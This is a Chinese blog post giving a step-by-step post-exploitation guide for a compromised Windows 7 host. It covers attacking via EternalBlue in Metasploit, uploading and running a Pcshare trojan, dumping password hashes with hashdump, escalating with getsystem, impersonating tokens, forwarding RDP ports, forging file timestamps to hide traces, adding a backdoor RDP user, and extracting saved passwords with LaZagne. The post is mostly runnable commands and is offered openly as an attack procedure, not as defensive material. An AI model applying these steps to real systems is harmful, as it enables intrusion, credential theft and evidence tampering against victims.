美文网首页
Ten 对肉鸡后期攻击

Ten 对肉鸡后期攻击

作者: _Beginner | 来源:发表于2020-03-10 17:07 被阅读0次

一.准备及介绍

1、本文介绍对win7肉鸡(未开防火墙)进行上下载文件等控制。

2、环境:win7、MSF、Pcshare


二. meterpreter后期攻击使用方法

1、使用Pcshare制作好木马(1.exe)后;SSH连接kali,打开MSF使用MS17-010(永恒之蓝)后:rz(把制作好的木马文件传到kali)

然后exploit;用(upload <file> <destination>):1)upload (-f) 1.exe c://inetpub(inetpub文件夹必须存在,否则会上传失败)。

 2)download <file> <path to save> :download c://17010.txt //root//csa 。

2、execute -f c://inetpub//1.exe(若文件有空格,路径需要加双引号)

3、ps(查看进程)、hashdump(转储所有账号的hash密码)、getsystem(命令可以提权到本地系统权限)

4、1)portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

       2)add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。

       3)portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

            4)删除端口转发:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

5、在目标主机上搜索文件:(search -f  *.txt)、获取用户ID(getuid)、获取系统信息(sysinfo)

6、1)模拟任意用户(token操作):use incognito

      2)list_tokens -u来显示所有有效的tokens

      3)impersonate_token "NT AUTHORITY\NETWORK SERVICE"

7、timestomp伪造时间戳。

                timestomp C:// -h   #查看帮助

                timestomp -v C://2.txt   #查看时间戳

                timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt

8、enable_rdp脚本开启3389:run post/windows/manage/enable_rdp  #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net

user添加;端口转发是利用的portfwd命令

9、使用laZagne查看账号密码:laZagne all >>23.txt 。

相关文章

  • Ten 对肉鸡后期攻击

    一.准备及介绍 1、本文介绍对win7肉鸡(未开防火墙)进行上下载文件等控制。 2、环境:win7、MSF、Pcs...

  • 云服务器常见的排查建议和攻击类型

    云服务器常见的排查建议和攻击类型 一:什么是肉鸡攻击 肉鸡就是被黑客攻击和入侵,在电脑里面放入了病毒和木马之类的后...

  • DDoS攻击的肉鸡都是哪来的?

    “肉鸡”可谓是DDoS攻击的核心大杀器,作为一个要发起DDoS攻击的黑客来说,没有肉鸡就是没有枪,裸奔不好使的。 ...

  • DDOS原理

    DDoS攻击就是利用网络上被攻陷的电脑作为“肉鸡”(关于肉鸡的问题可以移步我的另一篇回答:DDoS 的肉鸡都是哪来...

  • 黑客必读:蜜罐技术的前世今生

    互联网世界的攻击者们,比现实世界的坏人们更善于隐藏自己,他们往往躲在肉鸡、代理的背后,肆无忌惮的攻击我们的站点。对...

  • 科普 ‖ 你知道这些网络术语吗?

    1、肉鸡: “肉鸡”(或傀儡机)也就是受黑客远程控制的电脑,通常被人们称作DDoS攻击。是一种黑客通过病毒控制的用...

  • 【【服务器租用与托管】为什么要选择高防服务器?

    联网的迅随着互联网的迅猛发展,恶意攻击者所控制的肉鸡攻击也越来越凶猛,在这样的环境下,不少网站遭到攻击,不少的用户...

  • 2018-02-02

    管理:以优势位置面向对象进行心智资源最大限度的利用的过程; 洗脑:权威性meme高强度、策略化的对肉鸡进行系统攻击...

  • 网络安全从业者“行话”

    安全从业者除了外部人员眼中的神秘,更有同行才了解的行话,下面这些行话你都掌握了吗? 一、攻击篇 1.攻击工具 肉鸡...

  • 肉鸡后期因感冒引起呼吸道疾病导致不增料,出栏料比高怎么办?

    肉鸡养殖后期是很关键,在寒冷的冬季,肉鸡不增料问题是比较严重的。不增料大部分鸡群都会有呼吸道症状,但是大群精神状况...

网友评论

      本文标题:Ten 对肉鸡后期攻击

      本文链接:https://www.haomeiwen.com/subject/ioawdhtx.html